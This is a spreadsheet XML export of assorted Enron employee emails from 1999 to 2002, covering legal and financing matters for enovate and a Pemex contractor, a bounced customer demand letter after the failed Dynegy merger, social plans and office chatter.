WorkLife_x000D_
Corporate Hands Child Care Nomination_x000D_
_x000D_
In addition, Enron in Action is available through a channel on my.home.enron.com.  To add this channel to your set-up click on the channels link at the top of the screen and under announcements check the Enron in Action box.  _x000D_
_x000D_
If you wish to add an announcement to Enron in Action, please fill out the attached form below and submit it to mailto:eia@enron.com no later than 12 PM Thursday each week._x000D_
_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 07:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>No sleeping on the job...</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Math-Wiz,_x000D_
_x000D_
I completely understand your plight.  I too am suffering a two o'clock, _x000D_
post-lunch slump (the coffee is simply not working at this point).  Anyway, I _x000D_
think a change of clothes prior to Steak Night is probably a good idea.  _x000D_
Also, driving tomorrow is not a problem... just let me know the gate code, _x000D_
apt. #, etc.  Along those same lines, what time did you want to head over _x000D_
there?  (For better-safe-than-sorry reasons, due to my job, I think no _x000D_
earlier than 7:30 p.m. is our best bet.)_x000D_
_x000D_
Hope you're having a lovely day and don't work too hard (Ha!!)._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ted Noble_x000D_
07/18/2000 02:05 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Every day needs a little dose of levity...  _x000D_
_x000D_
Hey Shorty,_x000D_
_x000D_
I hope your day is going well.  We took our MD out for lunch because he is _x000D_
relocating to NY and will spend about a week in Houston a month.  Well, to _x000D_
make a short story long, we ate at Erma's (great food) but I am getting very _x000D_
sleepy (life is difficult I know) from eating way too much.  I assume we are _x000D_
going home to change into some casual/hot weather clothes before dinner _x000D_
tomorrow and I may need you to pick me up.  I am still looking for some good _x000D_
jokes that I can send to you that are funny but still moderately appropriate _x000D_
(most are completely inappropriate - I have sick friends).  Check out _x000D_
www.darwinawards.com for some funny but true stories.  I'll talk to you later._x000D_
_x000D_
Ted_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 13:26:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'aaron.berutti@enron.com'})</t>
  </si>
  <si>
    <t>in general, we want all history available.  You never know when they're going to remove it._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Berutti, Aaron  _x000D_
Sent:	Tuesday, October 09, 2001 3:03 PM_x000D_
To:	Smith, Matt_x000D_
Subject:	RE: _x000D_
_x000D_
 &lt;&lt; File: gzn.ica &gt;&gt; let me know if this doesn't work.  i'm grabbing the last two months of data for them to input into the database.  let me know how far back you want and i'll try to grab it._x000D_
_x000D_
aaron_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Smith, Matt  _x000D_
Sent:	Tuesday, October 09, 2001 2:35 PM_x000D_
To:	Berutti, Aaron_x000D_
Subject:	_x000D_
_x000D_
can you email me the gzn file.  My hard drive was replaced and I lost everything on my desktop.</t>
  </si>
  <si>
    <t>Re: enovate stuff</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kathleen,_x000D_
_x000D_
I want to get Laura Luce to direct us to give Gregg signing authority.  As _x000D_
you know, the request for Ben came from Janet, not Ben. I'll check with her.  _x000D_
do you have the LLC agreement to see how changes are handled?  If not, you _x000D_
can get a copy of my copy.  It is not a standard agreement._x000D_
_x000D_
On the CA, please make the effective period two years from the latest _x000D_
disclosure of info, and the disclosures will be ongoing. I don't have the CA _x000D_
in front of me, but does it say that Peoples has to get their consultants to _x000D_
sign a CA as well?  It is a good question._x000D_
_x000D_
Ta ta for now,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kathleen Carnahan                           11/08/2000 08:27 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: enovate stuff_x000D_
_x000D_
Kay,_x000D_
_x000D_
Gregg posed an interesting question yesterday regarding the Confidentiality _x000D_
Agreement.  If Peoples supplies our confidential information to Arthur _x000D_
Andersen, and someone from AA tells the world our secrets, would Peoples be _x000D_
on the hook pursuant to our CA?  I guess one way we could take care of this _x000D_
would be to include Arthur Andersen on Schedule I of the CA as one of _x000D_
Peoples' Representatives.  Any thoughts?_x000D_
_x000D_
Also, I will work on getting Gregg signing authority re his message below._x000D_
_x000D_
Kathleen_x000D_
---------------------- Forwarded by Kathleen Carnahan/NA/Enron on 11/08/2000 _x000D_
08:16 AM ---------------------------_x000D_
From: Gregg Penman on 11/07/2000 04:15 PM_x000D_
To: Kathleen Carnahan/NA/Enron@Enron_x000D_
cc: Kay Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: enovate stuff_x000D_
_x000D_
Kathleen - This e-mail should aid in the preparation of the Board _x000D_
Resolutions.  The attached file lists the appointment changes.  As for my _x000D_
signature authority, I am expecting that I would need to sign on behalf of _x000D_
enovate, L.L.C., Enron MW, L.L.C. and I suppose Enron North America by _x000D_
association.  The dollar amount can be set as low as practical.  I think in _x000D_
the L.L.C. agreement the Board reserves the right to approve contracts in _x000D_
excess of $50,000.  The real need is for pushing paper such as CA's, Master _x000D_
Purchase Agreements, etc.  Here is another question, if my authority is _x000D_
limited, who has the authority to sign in excess of my limit?  Laura Luce _x000D_
previously had such authority as General Manager (she is a VP at ENA).  If _x000D_
she now becomes the Board Member, can she also sign on behalf of enovate?  If _x000D_
so, is that because she is an officer of Enron MW or because she is a Board _x000D_
Member (i.e., can Peoples Board Member sign on behalf of enovate)?_x000D_
_x000D_
Thanks - Gregg_x000D_
----- Forwarded by Gregg Penman/Corp/Enron on 11/07/2000 03:47 PM -----_x000D_
_x000D_
	Gregg Penman_x000D_
	10/31/2000 11:50 AM_x000D_
		_x000D_
		 To: Kay Mann/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Re: enovate stuff_x000D_
_x000D_
1)_x000D_
_x000D_
3) I think we want it to apply to whatever entity employs the individuals _x000D_
with access.  Most of these people will probably Peoples Energy Corp. _x000D_
employees, but I suppose we could make it also include all of their _x000D_
affiliates.  enovate can sign the CA as well, but since enovate doesn't have _x000D_
any employees I was assuming we could use Peoples Energy as the responsible _x000D_
legal entity._x000D_
_x000D_
4) After 3:00 is fine, let me know for sure soon enough that I can lock Sarah _x000D_
up._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Gregg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann_x000D_
	10/31/2000 11:29 AM_x000D_
		_x000D_
		 To: Gregg Penman/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Re: enovate stuff_x000D_
_x000D_
1)The cybergoblins ate the attachment._x000D_
2) OK_x000D_
3) Which Peoples is it?  Also, I think enovate should sign at CA._x000D_
4)  I sent Heather an email re her availability.  There's a bunch of _x000D_
construction near downtown, so I would hesitate to commit to an early call, _x000D_
but I know I'm free after 300 tomorrow._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Gregg Penman on 10/31/2000 11:25 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: enovate stuff_x000D_
_x000D_
Kay - _x000D_
_x000D_
1) Attached is my quick attempt at writing something to make the management _x000D_
changes at enovate that we discussed.  Could you please review this and add _x000D_
the appropriate legal language.  I don't think that we need any Board _x000D_
approval for any of these changes, so is some type of notification sufficient?_x000D_
_x000D_
2)  I would like to address the idea of signature authorities other than _x000D_
Laura at the same time.  My suggestion would be that Richard and myself be _x000D_
granted some level of authority to execute CA's, Master Agreements, etc. that _x000D_
have been reviewed and approved by legal.  If you can at least pull the _x000D_
template you used to get approval for the Director you mentioned and see if _x000D_
there would be any changes necessary that would be helpful._x000D_
_x000D_
3) I need to get the CA form for the curves and other information started.  _x000D_
We can discuss this any time you want._x000D_
_x000D_
4) What is your availability tomorrow either 8-9:15 or after 3:00 to discuss _x000D_
the intercompany loan agreement, and will Heather be available?_x000D_
_x000D_
I will be leaving around 2:00 for suburban trick or treating._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Gregg _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 23:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/22/2000 _x000D_
07:54 AM ---------------------------_x000D_
_x000D_
_x000D_
	Clayton Vernon @ ENRON_x000D_
	12/21/2000 03:51 PM_x000D_
	_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: f/up_x000D_
_x000D_
Vince-_x000D_
_x000D_
I got your message (I was up on the roof of the building helping to fix the _x000D_
weather satellite dish- what a gorgeous view of Houston!)._x000D_
_x000D_
I appreciate your words. Everything remains fine, Vince. You are my "father" _x000D_
here at Enron, and I admire and respect you greatly. I think I know the kind _x000D_
of person you are, in terms of your integrity, and I admire the high _x000D_
standards you set for all of us in your extended "Group."_x000D_
_x000D_
I want to let you know I am not the only one in the group who doesn't _x000D_
appreciate the way Maureen disrespects you. You remain the key external _x000D_
factor in their success- it is not simply their own abilities that matter to _x000D_
their futures but your own- Vince's- success with upper management that _x000D_
matters._x000D_
_x000D_
We respect you, and we don't like it when you are disrespected. Maureen _x000D_
didn't disrespect me today, Vince, she disrespected you._x000D_
_x000D_
It's time I told you something. Last April, Maureen, highly intoxicated _x000D_
following a work-related function at Ninfa's, made an unsolicited predatory _x000D_
sexual advance on me at my desk on the 19th floor. I was shocked and _x000D_
disgusted, but I didn't say one word about this, Vince, because I played it _x000D_
out and didn't want to put you into the position of having a raving Maureen _x000D_
in your midst as you perhaps had to fire her and then endure a litany of _x000D_
gender-bias crap lawsuits._x000D_
_x000D_
I "took one for the team," Vince. I can'rt say I would do it again- Maureen _x000D_
is brazen to berate me after what she did, in public no less._x000D_
_x000D_
I appreciate your bringing me into Enron. I've found a respectful and, _x000D_
indeed, a loving work environment. I remain willing to do whatever I can to _x000D_
help the Group._x000D_
_x000D_
Clayton_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 03:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>we're done for sunday @ 12:30 at cypress lakes.  do you know anyone else who _x000D_
will play?</t>
  </si>
  <si>
    <t>Tue, 5 Oct 1999 07:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.balette@enron.com'})</t>
  </si>
  <si>
    <t>House for Rent</t>
  </si>
  <si>
    <t xml:space="preserve">Stephanie:_x000D_
_x000D_
Sorry I didn't see your response until today.  The prior tenant is moving out _x000D_
today so the house will be available as soon as I can get it cleaned up and _x000D_
any necessary repairs made.  Let me know if you'd like to see it._x000D_
_x000D_
Mark_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chad.gronvold@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">If its Stephanie you die!  I'm working on killing JD now._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chad Gronvold_x000D_
06/27/2000 03:29 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Take a guess_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 02:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peaker@energy.ca.gov'})</t>
  </si>
  <si>
    <t>[PEAKER-LIST] Chino News Release</t>
  </si>
  <si>
    <t>A news release regarding the Commission Schedules Information Hearing and _x000D_
Site Visit of Proposed Power Plant Site in Chino has been posted.  To view _x000D_
this news release, please visit:_x000D_
_x000D_
http://www.energy.ca.gov/releases/2001_releases/2001-05-12_chino.html_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jon Doidge_x000D_
CEC Web Team</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 11:27:24 -0800 (PST)</t>
  </si>
  <si>
    <t>not as much as me_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ooohhh, I'm excited!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
youll see_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
so where are we going to go?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:26 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
ok me too_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:26 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I'm not too sure yet...I'm going to try to leave around 3 or 3:30_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:25 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i dont know what time are you_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:23 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
What time are you leaving today?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:23 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
so lets go_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:18 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
Yes! Believe me, I can't wait!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 11:46 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
early this week i hope_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:30 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
okay, I will...this week! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:29 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
prove it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:28 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you are the big cheese to me baby! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:27 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i dont really know what he is going to do, i thought i was always the big cheese_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:26 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
REALLY, where is he going? Are you going to be the big cheese now?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:25 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i am staying also but john is not_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:25 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
no he's staying...what about you?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:24 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
me too, is chris leaving_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:24 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I wish...that would be my dream job! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:23 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
really, so who then, me?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:23 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
yeah, but I don't know for who...I don't think I will be working for Chris. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:22 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
im glad to hear that, so are you going to be doing the same thing_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:21 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
Not at all...I just now got my offer letter...FINALLY.  What about you? Anything exciting?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:20 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	_x000D_
_x000D_
anything exciting going on over there</t>
  </si>
  <si>
    <t>Sun, 18 Mar 2001 23:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Please, forward tot he group._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/19/2001=_x000D_
=20_x000D_
07:48 AM ---------------------------_x000D_
_x000D_
_x000D_
Barbara Ostdiek &lt;ostdiek@rice.edu&gt; on 03/16/2001 03:33:59 PM_x000D_
To: ostdiek@rice.edu_x000D_
cc: =20_x000D_
Subject: RICE/ENRON FINANCE SEMINAR SERIES_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron Seminar Series in Finance_x000D_
Jones Graduate School of Management, Rice University_x000D_
_x000D_
Paul Schultz_x000D_
University of Notre Dame_x000D_
_x000D_
will give a seminar at the Jones School on Friday, March 30,?=20_x000D_
_x000D_
?????????????????????????????????????? =01&amp;Who Makes Markets=018_x000D_
_x000D_
The seminar will begin at 3:30 in Room 115._x000D_
_x000D_
The paper will be made available shortly._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 06:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EPC 43/50 (Demar)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 06/20/2000 01:17 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
09/02/1999 08:34 AM_x000D_
To: Robert E MacMillan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: David Barru/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Eddie _x000D_
Clay/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jerry D _x000D_
Martin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bill _x000D_
Harris/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Erik _x000D_
Kingshill/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Keith _x000D_
Marlow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ed _x000D_
Giblin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert E _x000D_
MacMillan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Dick _x000D_
Westfahl/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jamie _x000D_
Dunlap/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Larry L _x000D_
Izzo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mary E _x000D_
Garza/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: EPC 43/50 (Demar)  _x000D_
_x000D_
Bob (and others),_x000D_
_x000D_
The line  of credit on EPC 4 is expired, and I believe tapped out, if you add _x000D_
in the fee to Enron ($5mm?) which remains unpaid.   Another option would be _x000D_
to try to get a security interest in the revenues on 4 for the new project.  _x000D_
I have been looking in to this option since you, Erik and I discussed this _x000D_
possibility.  Input from Mexican counsel will be required and has been _x000D_
sought.  _x000D_
_x000D_
Dick has scheduled a meeting for later today when we can brainstorm on these _x000D_
options.  I'm confident that there will be a way to skin this cat, it just _x000D_
may take a few days to sort through._x000D_
_x000D_
Kay _x000D_
_x000D_
_x000D_
_x000D_
Robert E MacMillan_x000D_
09/02/99 07:44 AM_x000D_
Sent by: Robert E MacMillan_x000D_
To: David Barru/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: John Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kay _x000D_
Mann/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Eddie _x000D_
Clay/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jerry D _x000D_
Martin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bill _x000D_
Harris/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Erik _x000D_
Kingshill/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Keith _x000D_
Marlow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ed _x000D_
Giblin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert E _x000D_
MacMillan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Dick _x000D_
Westfahl/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jamie _x000D_
Dunlap/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Larry L _x000D_
Izzo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mary E _x000D_
Garza/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: EPC 43/50 (Demar)  _x000D_
_x000D_
David,_x000D_
_x000D_
To mitigate the risk of funding Demar before an assignment of contract _x000D_
revenue for the EPC-43/50 offshore work is in place we could seek written _x000D_
confirmation from Demar that the present assignment of contract revenues can _x000D_
be utilized to cover early advances for this new work.  It is my _x000D_
understanding that there is in excess of $60MM to collect and the present _x000D_
$20MM line of credit is funded to $16MM+._x000D_
_x000D_
The collateral in place is a barge worth approximately $12MM, property in Cd. _x000D_
del Carmen worth approximately $3.2MM and a house in Mexico City worth _x000D_
approximately $500,000.  Obviously the source of repayment is the revenue _x000D_
from the Pemex contract EPC-4 which we receive in a bank account controlled _x000D_
by Enron._x000D_
_x000D_
Practically, the Pemex contract will likely take 30 days to execute and an _x000D_
assignment of contract revenues which can only be requested after the _x000D_
contract execution, will take approximately 1 week to have in hand.  Due to _x000D_
urgent nature of the work, that is, it will start immediately upon advice of _x000D_
award from Pemex, Demar can not wait some 40 days for funding.  _x000D_
_x000D_
Our experience with Demar has been good, so good as a matter of fact that we _x000D_
have decided not to provide the administrative support in Cd. del Carmen and _x000D_
Mexico City to which we are  obligated in our agreement with Demar._x000D_
_x000D_
I ask all members of the team to consider the possibility of funding _x000D_
initially under the EPC-4 agreements, which need to be extended in any event _x000D_
and to add language to cover this issue would be fairly straight forward._x000D_
_x000D_
Bob MacMillan  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 2 Dec 2001 20:17:54 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Returned mail: see transcript fo</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: SCOTT POTTERACK [mailto:Scott.Potterack@owens-ill.com]_x000D_
Sent: Wednesday, November 28, 2001 7:25 PM_x000D_
To: david.delainey@enron.com_x000D_
Subject: FW:Returned mail: see transcript fo_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Scott Potterack_x000D_
Owens-Illinois, Inc._x000D_
One Seagate_x000D_
Toledo, OH 43666_x000D_
419.247.1982_x000D_
419.247.1014 fax_x000D_
scott.potterack@owens-ill.com_x000D_
------------------( Forwarded letter 1 follows )---------------------_x000D_
Date: Wed, 28 Nov 2001 17:55:30 -0500 (EST)_x000D_
To: Scott.Potterack_x000D_
From: Mail.Delivery.Subsystem[MAILER-DAEMON]@oiss0001.owens-ill.com_x000D_
Sender: MAILER-DAEMON@gcs.alias_x000D_
Subject: Returned mail: see transcript for details_x000D_
_x000D_
The original message was received at Wed, 28 Nov 2001 17:55:29 -0500 (EST)_x000D_
from root@localhost_x000D_
_x000D_
   ----- The following addresses had permanent fatal errors -----_x000D_
&lt;david.delaine@enron.com&gt;_x000D_
    (reason: 550 5.1.1 &lt;david.delaine@enron.com&gt;... User unknown)_x000D_
_x000D_
   ----- Transcript of session follows -----_x000D_
... while talking to mailman.enron.com.:_x000D_
&gt;&gt;&gt; RCPT To:&lt;david.delaine@enron.com&gt;_x000D_
&lt;&lt;&lt; 550 5.1.1 &lt;david.delaine@enron.com&gt;... User unknown_x000D_
550 5.1.1 &lt;david.delaine@enron.com&gt;... User unknown_x000D_
_x000D_
------------------( Forwarded letter follows )--------------------_x000D_
Reporting-MTA: dns; oiss0001.owens-ill.com_x000D_
Arrival-Date: Wed, 28 Nov 2001 17:55:29 -0500 (EST)_x000D_
_x000D_
Final-Recipient: rfc822; david.delaine@enron.com_x000D_
Action: failed_x000D_
Status: 5.1.1_x000D_
Remote-MTA: DNS; mailman.enron.com_x000D_
Diagnostic-Code: SMTP; 550 5.1.1 &lt;david.delaine@enron.com&gt;... User unknown_x000D_
Last-Attempt-Date: Wed, 28 Nov 2001 17:55:30 -0500 (EST)_x000D_
_x000D_
------------------( Forwarded letter follows )--------------------_x000D_
Return-Path: &lt;Scott.Potterack@owens-ill.com&gt;_x000D_
Received: from oiss0001.owens-ill.com (root@localhost)_x000D_
	by oiss0001.owens-ill.com with ESMTP id fASMtT515976_x000D_
	for &lt;david.delaine@enron.com&gt;; Wed, 28 Nov 2001 17:55:29 -0500 (EST)_x000D_
Received: from ointvir1.owens-ill.com (ointvir1.owens-ill.com [10.196.24.75])_x000D_
	by oiss0001.owens-ill.com with SMTP id fASMtTZ15968_x000D_
	for &lt;david.delaine@enron.com&gt;; Wed, 28 Nov 2001 17:55:29 -0500 (EST)_x000D_
Received: FROM taogcs01.owens-ill.com BY ointvir1.owens-ill.com ; Wed Nov 28 17:55:27 2001 -0500_x000D_
X-Internal-ID: 3C03ED9300004E76_x000D_
Received: from owens-ill.com (10.24.8.70) by taogcs01.owens-ill.com (NPlex 2.0.119); Wed, 28 Nov 2001 17:55:27 -0500_x000D_
Message-ID: &lt;NZ6ec32e-6a10567a@owens-ill.com&gt;_x000D_
Date: Wed, 28 Nov 2001 17:54:00 -0500_x000D_
From: "SCOTT POTTERACK" &lt;Scott.Potterack@owens-ill.com&gt;_x000D_
To: michael.mann@enron.com, david.delaine@enron.com_x000D_
Cc: tvalenzu@enron.com, mpalmer1@enron.com_x000D_
Subject: Ability to Perform_x000D_
_x000D_
Based on confirmation by Tony Valenzuela that the Enron - Dynergy merger will_x000D_
not occur as suggested in your memo of November 20, 2001, I am concerned about_x000D_
your company's ability to perform under our Commodity Management Agreement_x000D_
(CMA) dated January 6, 2001._x000D_
_x000D_
Accordingly, please:_x000D_
_x000D_
1. prove to me that the utility accounts for which your company provides bill_x000D_
payment services are current and utility invoices for the October month_x000D_
business have been paid and there are no amounts in arrears,_x000D_
_x000D_
2. prove to me that natural gas deliveries were properly made for November,_x000D_
2001  into the citygates of the local distribution companies which service the_x000D_
natural gas accounts listed in the CMA,_x000D_
_x000D_
3. Prove to me that natural gas deliveries will be properly made for December,_x000D_
2001  into the citygates of the local distribution companies which service the_x000D_
natural gas accounts listed in the CMA._x000D_
_x000D_
Please provide this information by the end of this week so that we are_x000D_
comfortable that our agreement is in proper working order for the month of_x000D_
December, 2001._x000D_
_x000D_
Thank you._x000D_
_x000D_
Scott Potterack_x000D_
Owens-Illinois, Inc._x000D_
One Seagate_x000D_
Toledo, OH 43666_x000D_
419.247.1982_x000D_
419.247.1014 fax_x000D_
scott.potterack@owens-ill.com</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 06:30:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
Good Morning,_x000D_
_x000D_
Just a reminder to get your AGA estimates in by Noon EST (11:00 CST) TODAY._x000D_
_x000D_
Last Year      +56_x000D_
Last Week      +118_x000D_
_x000D_
Thank You,_x000D_
